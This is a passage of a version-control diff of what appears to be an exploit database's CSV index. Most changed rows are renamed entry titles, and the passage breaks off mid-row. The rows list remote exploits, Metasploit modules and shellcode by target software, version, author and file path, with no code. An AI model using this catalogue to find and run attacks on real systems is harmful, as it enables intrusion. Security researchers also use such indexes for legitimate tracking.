18514,platforms/windows/remote/18514.rb,"Trend Micro Control Manger 5.5 - CmdProcessor.exe Stack Buffer Overflow (Metasploit)",2012-02-23,Metasploit,windows,remote,0 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)",2012-02-25,Metasploit,windows,remote,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 -18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Authenticated SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 +18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Authenticated (SEH)",2012-02-27,"Craig Freyman",windows,remote,0 18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - 'ipswcom.dll' ActiveX Stack Buffer Overflow (Metasploit)",2012-02-29,Metasploit,windows,remote,0 18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access Workstation 5.9 - Profile (Metasploit)",2012-02-29,Metasploit,windows,remote,0 @@ -12277,7 +12281,7 @@ id,file,description,date,author,platform,type,port 20850,platforms/windows/remote/20850.txt,"Pacific Software Carello 1.2.1 Shopping Cart - Command Execution",2001-05-14,"Peter Gründl",windows,remote,0 20865,platforms/java/remote/20865.rb,"Java 7 Applet - Remote Code Execution (Metasploit)",2012-08-27,Metasploit,java,remote,0 20869,platforms/multiple/remote/20869.html,"eSafe Gateway 2.1 - Script-filtering Bypass",2001-05-20,"eDvice Security Services",multiple,remote,0 -20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 - ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0 +20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 - ASLR Bypass",2012-08-28,pole,windows,remote,0 20878,platforms/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal",2001-05-23,joetesta,cgi,remote,0 20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6 / HP-UX 10/11 / Solaris 2.6/7.0/8 - rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0 20881,platforms/multiple/remote/20881.txt,"Beck IPC GmbH IPC@CHIP - TelnetD Login Account Brute Force",2001-05-24,"Courtesy Sentry Research Labs",multiple,remote,0 @@ -12606,7 +12610,7 @@ id,file,description,date,author,platform,type,port 21710,platforms/windows/remote/21710.txt,"MyWebServer 1.0.2 - Long HTTP Request HTML Injection",2002-08-14,D4rkGr3y,windows,remote,0 21711,platforms/windows/remote/21711.html,"Microsoft Outlook Express 5/6 - MHTML URL Handler File Rendering",2002-08-15,http-equiv,windows,remote,0 21717,platforms/windows/remote/21717.txt,"Microsoft Windows XP - HCP URI Handler Abuse",2002-08-15,"Shane Hird",windows,remote,0 -21718,platforms/windows/remote/21718.txt,"Microsoft SQL 2000/7.0 - Agent Jobs Privilege Elevation",2002-08-15,"David Litchfield",windows,remote,0 +21718,platforms/windows/remote/21718.txt,"Microsoft SQL 2000/7.0 - Agent Jobs Privilege Escalation",2002-08-15,"David Litchfield",windows,remote,0 21719,platforms/windows/remote/21719.txt,"Apache 2.0 - Full Path Disclosure",2002-08-16,"Auriemma Luigi",windows,remote,0 21722,platforms/linux/remote/21722.pl,"Lynx 2.8.x - Command Line URL CRLF Injection",2002-08-19,"Ulf Harnhammar",linux,remote,0 21725,platforms/linux/remote/21725.c,"MySQL 3.20.32/3.22.x/3.23.x - Null Root Password Weak Default Configuration (1)",2002-08-19,g0thm0g,linux,remote,0 @@ -12823,7 +12827,7 @@ id,file,description,date,author,platform,type,port 22454,platforms/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",linux,remote,0 22455,platforms/hardware/remote/22455.txt,"Netgear FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,hardware,remote,0 22462,platforms/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",multiple,remote,0 -22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based Exploit (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0 +22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - (SEH) Stack Overflow ROP-Based Exploit (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0 22468,platforms/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,unix,remote,0 22469,platforms/unix/remote/22469.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)",2003-04-07,c0wboy,unix,remote,0 22470,platforms/unix/remote/22470.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)",2003-05-12,eDSee,unix,remote,0 @@ -13619,7 +13623,7 @@ id,file,description,date,author,platform,type,port 25802,platforms/linux/remote/25802.txt,"C.J. Steele Tattle - Remote Command Execution",2005-06-07,b0iler,linux,remote,0 25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab - ActiveX Heap Overflow (Metasploit)",2013-05-29,Metasploit,windows,remote,0 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0 -25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution",2013-05-30,xis_one,windows,remote,0 +25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - Remote Code Execution (SEH)",2013-05-30,xis_one,windows,remote,0 25841,platforms/windows/remote/25841.txt,"Yaws 1.5x - Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote,0 25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0 25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 - db_netserver Stack Buffer Overflow (Metasploit)",2013-05-31,Metasploit,windows,remote,8001 @@ -13739,7 +13743,7 @@ id,file,description,date,author,platform,type,port 27325,platforms/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal",2006-02-27,"Donato Ferrante",windows,remote,0 27326,platforms/linux/remote/27326.txt,"MySQL 5.0.18 - Query Logging Bypass",2006-02-27,1dt.w0lf,linux,remote,0 27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 - Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0 -27397,platforms/linux/remote/27397.txt,"Apache suEXEC - Privilege Elevation / Information Disclosure",2013-08-07,kingcope,linux,remote,0 +27397,platforms/linux/remote/27397.txt,"Apache suEXEC - Information Disclosure / Privilege Escalation",2013-08-07,kingcope,linux,remote,0 27400,platforms/windows/remote/27400.py,"HP Data Protector - Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0 27401,platforms/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0 27428,platforms/hardware/remote/27428.rb,"D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit)",2013-08-08,Metasploit,hardware,remote,0 @@ -14195,7 +14199,7 @@ id,file,description,date,author,platform,type,port 31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,hardware,remote,0 31149,platforms/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x - Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",windows,remote,0 31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",windows,remote,0 -40760,platforms/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - SEH Overflow (Metasploit)",2016-11-15,"Tracy Turben",windows,remote,0 +40760,platforms/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - Overflow (SEH) (Metasploit)",2016-11-15,"Tracy Turben",windows,remote,0 31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0 31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0 31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,windows,remote,5555 @@ -14663,7 +14667,7 @@ id,file,description,date,author,platform,type,port 34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) - Cross-Site Request Forgery",2010-05-26,"John Leitch",windows,remote,0 34048,platforms/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 - 'pbx/gate' Cross-Site Request Forgery",2010-05-26,"John Leitch",multiple,remote,0 34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal",2010-05-27,"John Leitch",windows,remote,0 -34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0 +34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request (SEH)",2014-07-14,"Revin Hadi Saputra",windows,remote,0 34063,platforms/hardware/remote/34063.rb,"D-Link - info.cgi POST Request Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 34065,platforms/hardware/remote/34065.rb,"D-Link - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,hardware,remote,1900 @@ -14862,7 +14866,7 @@ id,file,description,date,author,platform,type,port 35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",windows,remote,0 35441,platforms/multiple/remote/35441.rb,"Tincd - Authenticated Remote TCP Stack Buffer Overflow (Metasploit)",2014-12-02,Metasploit,multiple,remote,655 35446,platforms/windows/remote/35446.pl,"Microsoft Windows Movie Maker 2.1.4026 - '.avi' Remote Buffer Overflow",2011-03-10,KedAns-Dz,windows,remote,0 -35474,platforms/windows/remote/35474.py,"Microsoft Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 +35474,platforms/windows/remote/35474.py,"Microsoft Windows Kerberos - Privilege Escalation (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 - URI SecURIty Bypass",2011-03-14,"DcLabs Security Research Group",multiple,remote,0 35466,platforms/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution",2011-03-05,"RedTeam Pentesting GmbH",linux,remote,0 35468,platforms/windows/remote/35468.pl,"Monkey's Audio - '.ape' Buffer Overflow",2011-03-16,KedAns-Dz,windows,remote,0 @@ -14950,7 +14954,7 @@ id,file,description,date,author,platform,type,port 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX SaveToFile() Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",windows,remote,0 35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias",hardware,remote,0 -35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass)",2015-01-30,Rh0,windows,remote,0 +35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - ASLR + DEP Bypass",2015-01-30,Rh0,windows,remote,0 35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0 35961,platforms/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",hp-ux,remote,0 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross-Site Request Forgery / HTML Injection",2011-07-18,MustLive,hardware,remote,0 @@ -15079,7 +15083,7 @@ id,file,description,date,author,platform,type,port 36957,platforms/php/remote/36957.rb,"WordPress Plugin RevSlider 3.0.95 - Arbitrary File Upload / Execution (Metasploit)",2015-05-08,Metasploit,php,remote,80 36962,platforms/windows/remote/36962.rb,"Adobe Flash Player - NetConnection Type Confusion (Metasploit)",2015-05-08,Metasploit,windows,remote,0 36964,platforms/java/remote/36964.rb,"Novell ZENworks Configuration Management - Arbitrary File Upload (Metasploit)",2015-05-08,Metasploit,java,remote,443 -36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0 +36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field (SEH)",2015-05-11,"Revin Hadi Saputra",windows,remote,0 36996,platforms/unix/remote/36996.rb,"SixApart MovableType - Storable Perl Code Execution (Metasploit)",2015-05-12,Metasploit,unix,remote,80 37007,platforms/linux/remote/37007.txt,"AtMail 1.04 - Multiple Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0 37020,platforms/windows/remote/37020.html,"Apple Safari 5.1.5 For Windows - 'window.open()' URI Spoofing",2012-03-28,Lostmon,windows,remote,0 @@ -15181,7 +15185,7 @@ id,file,description,date,author,platform,type,port 38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV - Information Disclosure",2013-01-29,"Alejandro Ramos",multiple,remote,0 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 -38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Authenticated CWD Command SEH Overflow (Metasploit)",2015-09-21,Metasploit,windows,remote,21 +38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Authenticated CWD Command Overflow (SEH) (Metasploit)",2015-09-21,Metasploit,windows,remote,21 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21 38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution (Metasploit)",2015-09-23,Metasploit,multiple,remote,6667 38308,platforms/hardware/remote/38308.txt,"TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0 @@ -15220,7 +15224,7 @@ id,file,description,date,author,platform,type,port 38513,platforms/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - Remote File Inclusion to Remote Code Execution",2015-10-22,Scurippio,windows,remote,0 38521,platforms/multiple/remote/38521.c,"Python RRDtool Module - Function Format String",2013-05-18,"Thomas Pollet",multiple,remote,0 38522,platforms/linux/remote/38522.txt,"Acme thttpd HTTP Server - Directory Traversal",2013-05-19,Metropolis,linux,remote,0 -38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0 +38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote Overflow (SEH)",2015-10-23,Audit0r,windows,remote,0 38535,platforms/osx/remote/38535.rb,"Apple Safari - User-Assisted Applescript Exec Attack (Metasploit)",2015-10-26,Metasploit,osx,remote,0 38644,platforms/windows/remote/38644.txt,"SolarWinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0 38541,platforms/php/remote/38541.rb,"Th3 MMA - mma.php Backdoor Arbitrary File Upload (Metasploit)",2015-10-27,Metasploit,php,remote,80 @@ -15331,7 +15335,7 @@ id,file,description,date,author,platform,type,port 39196,platforms/linux/remote/39196.py,"Apache mod_wsgi - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0 39205,platforms/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote,0 39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0 -39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21 +39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)",2016-01-11,TOMIWA,windows,remote,21 39218,platforms/windows/remote/39218.html,"Trend Micro - node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0 39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0 39224,platforms/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22 @@ -15355,7 +15359,7 @@ id,file,description,date,author,platform,type,port 39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443 39569,platforms/multiple/remote/39569.py,"OpenSSH 7.2p1 - Authenticated xauth Command Injection",2016-03-16,tintinweb,multiple,remote,22 -39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share SEH Overflow Remote Code Execution",2016-03-21,"Paul Purcell",windows,remote,80 +39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow (SEH) Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",windows,remote,80 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0 39599,platforms/windows/remote/39599.txt,"Comodo AntiVirus - Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0 39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0 @@ -15404,7 +15408,7 @@ id,file,description,date,author,platform,type,port 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0 40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80 40136,platforms/linux/remote/40136.py,"OpenSSHd 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 -40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - WRQ Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69 +40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - 'WRQ' Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69 40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0 40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 @@ -15414,7 +15418,7 @@ id,file,description,date,author,platform,type,port 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000 -40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80 +40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - (SEH) Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0 40232,platforms/linux/remote/40232.py,"FreePBX 13 / 14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0 @@ -15591,6 +15595,7 @@ id,file,description,date,author,platform,type,port 42155,platforms/windows/remote/42155.py,"EFS Easy Chat Server 3.1 - Buffer Overflow (SEH)",2017-06-09,"Aitezaz Mohsin",windows,remote,0 42158,platforms/linux/remote/42158.py,"Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution",2017-06-11,agix,linux,remote,0 42159,platforms/windows/remote/42159.txt,"Easy File Sharing Web Server 7.2 - Authentication Bypass",2017-06-11,"Touhid M.Shaikh",windows,remote,0 +42165,platforms/windows/remote/42165.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow",2017-06-12,"Touhid M.Shaikh",windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -15853,7 +15858,7 @@ id,file,description,date,author,platform,type,port 13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0 13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Bind Shell Port 28876 Null-Free Shellcode",2009-07-27,Skylined,win_x86,shellcode,0 13505,platforms/win_x86/shellcode/13505.c,"Win32/XP SP2 (EN) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0 -13507,platforms/win_x86/shellcode/13507.txt,"Win32 - SEH omelet Shellcode",2009-03-16,Skylined,win_x86,shellcode,0 +13507,platforms/win_x86/shellcode/13507.txt,"Win32 - SEH Omelet Shellcode",2009-03-16,Skylined,win_x86,shellcode,0 13508,platforms/win_x86/shellcode/13508.asm,"Win32 - Winexec Telnet Bind 23 Port Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode,0 13509,platforms/win_x86/shellcode/13509.c,"Win32 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,win_x86,shellcode,0 13510,platforms/win_x86/shellcode/13510.c,"Win32 XP SP2 (FR) - Sellcode cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0 @@ -16701,8 +16706,8 @@ id,file,description,date,author,platform,type,port 1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution",2006-06-04,K-159,php,webapps,0 1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - (includePath) Remote Code Execution",2006-06-05,rgod,php,webapps,0 1878,platforms/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,php,webapps,0 -1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 -1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - (da_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 +1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - 'file_path' Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 +1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - 'da_path' Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a - 'edit.php' Remote Password Disclosure",2006-06-05,DarkFig,php,webapps,0 1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - 'wk_lang.php' Remote File Inclusion",2006-06-06,Kacper,php,webapps,0 1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - 'adminLogin.asp' Login Bypass",2006-06-06,FarhadKey,asp,webapps,0 @@ -16720,7 +16725,7 @@ id,file,description,date,author,platform,type,port 1899,platforms/php/webapps/1899.txt,"free QBoard 1.1 - (qb_path) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 1900,platforms/asp/webapps/1900.txt,"MaxiSepet 1.0 - (link) SQL Injection",2006-06-11,nukedx,asp,webapps,0 1901,platforms/php/webapps/1901.pl,"RCblog 1.03 - (POST) Remote Command Execution",2006-06-11,Hessam-x,php,webapps,0 -1902,platforms/php/webapps/1902.txt,"AWF CMS 1.11 - (spaw_root) Remote File Inclusion",2006-06-11,"Federico Fazzi",php,webapps,0 +1902,platforms/php/webapps/1902.txt,"AWF CMS 1.11 - 'spaw_root' Remote File Inclusion",2006-06-11,"Federico Fazzi",php,webapps,0 1903,platforms/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",php,webapps,0 1904,platforms/php/webapps/1904.php,"blur6ex 0.3.462 - 'ID' Admin Disclosure / Blind SQL Injection",2006-06-12,rgod,php,webapps,0 1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x - (root) Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps,0 @@ -17176,7 +17181,7 @@ id,file,description,date,author,platform,type,port 2518,platforms/php/webapps/2518.txt,"SH-News 3.1 - 'scriptpath' Parameter Remote File Inclusion",2006-10-11,v1per-haCker,php,webapps,0 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - 'ftag.php' Remote File Inclusion",2006-10-11,Zickox,php,webapps,0 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - File Inclusion",2006-10-12,MP,php,webapps,0 -2521,platforms/php/webapps/2521.txt,"Download-Engine 1.4.2 - (spaw) Remote File Inclusion",2006-10-12,v1per-haCker,php,webapps,0 +2521,platforms/php/webapps/2521.txt,"Download-Engine 1.4.2 - 'spaw' Remote File Inclusion",2006-10-12,v1per-haCker,php,webapps,0 2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 2526,platforms/php/webapps/2526.txt,"PHPht Topsites - 'common.php' Remote File Inclusion",2006-10-12,"Mehmet Ince",php,webapps,0 @@ -26635,7 +26640,7 @@ id,file,description,date,author,platform,type,port 22651,platforms/php/webapps/22651.txt,"PostNuke 0.72x Phoenix Glossary Module - SQL Injection",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22654,platforms/php/webapps/22654.txt,"bananadance wiki b2.2 - Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,php,webapps,0 22656,platforms/php/webapps/22656.py,"vBulletin vBay 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps,0 -22663,platforms/php/webapps/22663.txt,"Newsscript 1.0 - Administrative Privilege Elevation",2003-05-27,"Peter Winter-Smith",php,webapps,0 +22663,platforms/php/webapps/22663.txt,"Newsscript 1.0 - Administrative Privilege Escalation",2003-05-27,"Peter Winter-Smith",php,webapps,0 22669,platforms/cgi/webapps/22669.txt,"Bandmin 1.4 - Cross-Site Scripting",2003-05-28,"silent needel",cgi,webapps,0 22671,platforms/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 - URI Parameter File Disclosure",2003-05-29,pokleyzz,php,webapps,0 22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Inclusion",2003-05-29,pokleyzz,php,webapps,0 @@ -27517,7 +27522,7 @@ id,file,description,date,author,platform,type,port 24690,platforms/unix/webapps/24690.txt,"IBM Lotus Domino 6.x - Cross-Site Scripting / HTML Injection",2004-10-18,"Juan C Calderon",unix,webapps,0 24692,platforms/php/webapps/24692.txt,"Jan Erdmann Jebuch 1.0 - HTML Injection",2004-10-19,PuWu,php,webapps,0 24697,platforms/php/webapps/24697.txt,"S9Y Serendipity 0.x - 